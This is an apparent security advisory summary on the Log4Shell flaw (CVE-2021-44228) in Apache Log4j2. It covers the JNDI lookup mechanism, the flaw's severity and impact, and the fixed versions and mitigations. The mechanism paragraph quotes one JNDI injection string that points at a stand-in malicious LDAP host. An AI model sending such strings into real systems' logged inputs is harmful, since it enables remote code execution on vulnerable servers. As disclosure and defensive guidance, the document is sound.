GHSA-mf4f-j588-5xm8: 
Java vulnerability analysis and mitigation

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) contains a critical vulnerability (CVE-2021-44228) known as Log4Shell, discovered in December 2021. The vulnerability affects the JNDI features used in configuration, log messages, and parameters, which do not protect against attacker-controlled LDAP and other JNDI-related endpoints. This vulnerability earned a CVSS score of 10.0 (Critical) due to its ease of exploitation and potential for full remote code execution (FortiGuard Labs, NVD).

The vulnerability stems from Log4j's interface with the JNDI (Java Naming and Directory Interface), which allows connection to external directory services such as LDAP. When message lookup substitution is enabled, an attacker can exploit this by adding a JNDI query to a connection request in a field that gets logged via Log4j. For example, using a string like '${jndi:ldap://malicious-server.host/aaa}'. When processed, the vulnerable Log4j version attempts to contact the malicious server with an LDAP query, which can result in downloading and executing malicious Java class files (FortiGuard Labs).

The vulnerability allows attackers who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers. This can lead to full remote code execution on the target system, potentially giving attackers complete control over vulnerable systems. The widespread use of Log4j in enterprise applications and cloud services makes this vulnerability particularly severe, with millions of applications including iCloud, Steam, and Minecraft being potentially affected (FortiGuard Labs).

For Java 8 or later users, updating to Log4j 2.17.0 is recommended. For Java 7 users, upgrading to version 2.12.2 is advised. Alternative mitigations include setting the system property log4j2.formatMsgNoLookups to true or removing the JndiLookup class from the classpath. The vulnerability only impacts the log4j-core JAR file; applications using only the log4j-api JAR file without the log4j-core JAR file are not affected (FortiGuard Labs).

The severity of the vulnerability prompted SANS to move their Infocon alert to yellow for the first time since the WannaCry outbreak in 2017. This level of alert has only previously been elevated for severe incidents such as Heartbleed and Shellshock. The vulnerability received widespread attention from the security community and vendors, with major companies like Microsoft, Oracle, and Cisco releasing advisories and patches for their affected products (FortiGuard Labs).